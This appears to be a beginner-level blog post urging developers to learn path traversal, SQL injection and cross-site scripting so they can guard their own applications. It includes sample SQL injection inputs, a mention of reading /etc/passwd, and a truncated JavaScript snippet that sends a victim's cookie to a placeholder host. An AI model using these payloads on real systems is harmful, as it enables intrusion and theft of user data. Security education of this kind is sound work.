IT security for developers (beginner level)

Security is essential in any application. It allows people to trust and feel at ease using our applications. It protects our source of income (read: applications)  from  hackers and cyber criminals attacks. Consequently, it prevents us from losing our money and customers.

Nonetheless, implementing security measures are not trivial. As managers, we need to know the vulnerability of our applications and possible threats due to their vulnerability. Hiring IT security professional can be a solution, but it means nothing without a proper support from our engineers. Why? because they will keep developing products with ‘security defect’. Thus, it is important to raise the security awareness of our software engineers. As software engineers, we need to be aware if our implementation can create holes for security breach and cyber attacks. Not only it will give us headache later on, but it will also taint our ‘track-records’.

Personally, I was (and most likely still am) a security agnostic engineer. I know it’s important but I never paid attention or care about it. However, I just had an ‘enlightenment’ after following a practical IT security training. It is important to at least able to identify and recognize common ‘security defect’ implementations. To do this, we need to have a hacker mindset.

Hacker mindset always gets to know its ‘preys’, asking about what the applications do and how they can be implemented. After getting acquainted with the preys, hacker mindset will list several potential attacks that can breach the applications. The standard operating procedure is to relentlessly perform penetration testing using a simple to an advanced path traversal attacks, SQL injections, and cross site scripting (XSS).

Path traversal attacks exploit the standard OS feature of ‘../’ to access files or directories outside of web root directory. This enables the attackers to gain useful information such as admin user/password in, for instance, /etc/passwd, and use that information for their profits.

SQL injections make full use of SQL queries and database features to gain access to valuable information stored in the database, such as username and password, credit card information, customer profiles, etc. A common first attempt would be filling an input form with 1′ and 1=1 #, or 1′ and 1=1 union select … #. Some databases also have features that actually make the attacks easier, e.g., MySql has a feature that translates ”*” into 0.

Cross-Site Scripting (XSS) is also a type of injection. It injects malicious scripts to trusted websites, typically in user input forms which have no proper validation or escape characters. For instance, inserting a malicious javascript code below to database is one way of stealing user cookie.

var i = new Image();
i.src = "https://your-whatever-website/" + 
    "?id=94a80283f4010ca5&message=" + 

Another example, front-end wise, a handlebar  mustache ({{mustache}}) has a space as its evil character. If we write code with mustache as a field property, you can actually put a javascript action to replace color something like “red onclick= …”. Thus, escaping space character or not using mustache to set property of a field would be countermeasures in this case.

<textarea id="message" color={{color}}>

Understanding these basic attacks helps us, engineers, to prevent basic security breaches in our applications. For more advanced level of attacks, we can always seek help from IT security professional to hack our applications and gives us inputs on how to improve the security of our system.

In sum, we as engineers need to really know your applications/system and their vulnerability. Try to hack the system ourselves with common types of attack. Seek assistance from IT security expert, then evolve and make our app more secure. Follow the trends of cyber attacks, and keep on improving our system’s security.

Recommended book: The tangled web by Michal Zawleski